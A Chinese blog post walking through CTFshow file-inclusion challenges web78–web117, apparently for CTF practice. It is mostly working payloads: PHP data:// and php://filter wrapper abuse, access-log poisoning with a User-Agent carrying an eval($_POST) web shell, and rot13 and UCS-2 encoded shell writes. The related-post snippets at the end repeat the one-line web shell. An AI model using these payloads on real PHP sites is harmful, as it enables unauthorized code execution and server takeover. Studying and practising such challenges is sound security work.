文件包含CTFshow

于 2023-11-05 22:19:01 发布
阅读量118 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74092885/article/details/134231828
版权

1.web78

 /?file=data://text/plain,<?php system("cat flag.php");?>

得到flag 

 

 2.web79

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg== 

 

 3.web80

替换了php和data

可以进行日志包含:通过user-agent头部注入命令

<?php @eval($_POST['a'])?> 

然后将日志包含进去,通过POST参数执行命令 

 

 找到

 "fl0g.php index.php"

a=system('cat fl0g.php'); 

得到flag

总结

//日志包含
/?file=/var/log/nginx/access.log
//命令执行
a=system('ls');
a=system('cat fl0g.php'); 

 4.web81

与上题一样

5.web87

 

# 双重url全编码
?file=php://filter/write=string.rot13/resource=1.php
# [POST DATA]
content=<?cuc flfgrz('gnp s*.cuc');?>  //<?php system('tac f*.php');?>

最后访问1.php
 

 6.web88

 

没有过滤冒号,使用 伪协议

?file=data://text/plain;base64,<?php system('tac *.php');?>  

这题多过滤了一点东西,发现也可以用data协议,data://text/plain;base64

但是直接base64加密的<?php system('tac f*');会有==号,过不了,所以换成代码执行。

payload:

?file=data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7&1=system('tac f*');
 <?php eval($_GET[1]);     ==      PD9waHAgZXZhbCgkX0dFVFsxXSk7

7.web116

 

进行抓包

加入 file=flag.php

 响应出flag

8.web117

过滤了base64和rot13

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php

post:contents=?<hp pvela$(P_SO[T]1;)>?

访问a.php,然后进行传参

1=system('tac flag.php'); 

南去良鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow 文件包含 web116
Kradress的博客
12-12 786
目录源码思路题解总结 源码 下载视频用winhex分离出png 思路 可以正常读文件 题解 直接跑字典 总结 水题
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7181
个人ctfshow刷题记录
Web安全-一句话木马
liuwei0376的专栏
08-20 4029
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
%3c?php@ eval($_post['post']);?%3e,web 攻击靶机
weixin_35171603的博客
04-01 1739
1、sql注入靶机攻击php首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24css发现可疑ip地址192.168.2.129sql并使用nmap扫描这个ip地址,发现其开放了ftp和http协议数据库 打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点cookie 在id=1后加一个引号,网页报错 该网站存在sql注入漏洞ssh...
CTFshow_web入门_文件包含
ScyLamb的博客
03-09 893
文件包含 文章目录文件包含0x00 web780x01 web790x02 web800x03 web810x04 web820x05 web830x06 web840x07 web850x08 web860x09 web870x0A web880x0B web1160x0C web117 0x00 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); 无过滤 ?file=php://filter/
隐写_Jphswin_ctfshow.rar
08-26
这个压缩包文件“隐写_Jphswin_ctfshow.rar”显然包含了这个工具的可执行文件,很可能用于参加类似于CTF(Capture The Flag)的信息安全竞赛或挑战。 Jphswin是一个基于JPEG图片的隐写工具,它利用JPEG文件格式的...
PHP特性(网友根据ctfshow整理)1
08-03
在处理文件路径时,PHP有时会允许相对路径或者伪协议(如`file://`)的使用,这可能引发安全风险,如文件包含漏洞。开发者应当谨慎处理文件路径,避免潜在的安全问题。 3. **三目运算符`?:`的理解与变量覆盖**: ...
ctfshow-VIP题目-Web-详细解题思路
最新发布
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这些关卡展示了URL解析漏洞的多种利用方式,包括命令注入、数据编码绕过过滤、多语言代码执行等。防范这些攻击的关键在于对用户输入进行严格的验证和过滤,避免将不受信任的数据直接传递给解释器执行。开发者应遵循...
CTFSHOW PHP特性篇(中篇 111-131)
羽的博客
10-21 4717
web111 function getFlag(&$v1,&$v2){ eval("$$v1 = &$$v2;"); var_dump($$v1); } if(isset($_GET['v1']) && isset($_GET['v2'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3184
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
ctfshow 文件包含
m0_74097148的博客
03-25 231
【代码】ctfshow 文件包含
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 858
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
【威胁分析】<?php eval($_POST[‘aa‘]);?>
LAngle9的博客
07-29 325
所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘a’]的话,只要使用post传输时在name为a的值中写入任何字符串,都可以当做php代码来执行。请求内容中有该内容,或请求内容中base64解码后有该内容。$_POST[‘aa’]aa=XXX,向后台传输的参数。eval()将括号内的字符串解析为php代码。...
CTFshow web入门——文件包含
小元砸的博客
02-07 3452
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
ctfshow web入门118-150wp
Firebasky的博客
10-25 1090
前段时间太忙啦,就没有发。但是羽师傅也发了呢 CTFSHOW PHP特性篇(中篇 111-131) CTFSHOW PHP特性篇 (下篇132-150) 我就不写博客啦,还是发pdf吧,需要的可以下载 链接:https://pan.baidu.com/s/1YnkfV5wfCqPFr2HW1MwUEg 提取码:c0gf 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
CTFShow web入门刷题记录-爆破
打酱油的杯具的博客
11-29 2273
CTFShow web入门刷题记录-爆破 web21 先下载提供的密码包,查看hint得知考点为tomcat 账号提示为amdin,点击提交并使用burpsuit抓包 发现底下为一串经过base64编码的文字,翻译后得知为admin: 得知提交格式为:账号:密码 传入intruder,选中并添加$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xsSzs95u-1606660930041)(C:/Users/%E8%83%A1%E5%A5%87/AppData/Roami
CTFSHOW WEB入门
qq_51558360的博客
10-11 4369
----------信息搜集---------- 源码泄露 查看源码即可 前台JS绕过 直接开发者工具查看源码 当然也可以抓包查看 也可以禁用js查看源码 协议头信息泄露 或者抓一下包也可 robots后台泄露 phps源码泄露 根据题目猜测输入index.phps 下载到一个index.phps打开得到flag 源码压缩包泄露 访问www.zip 没有flag,尝试访问fl000g.txt 版本控制泄露源码 Git是一个开源的分布式版本控制系统 git代码泄露,git上传代码会在目录创

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值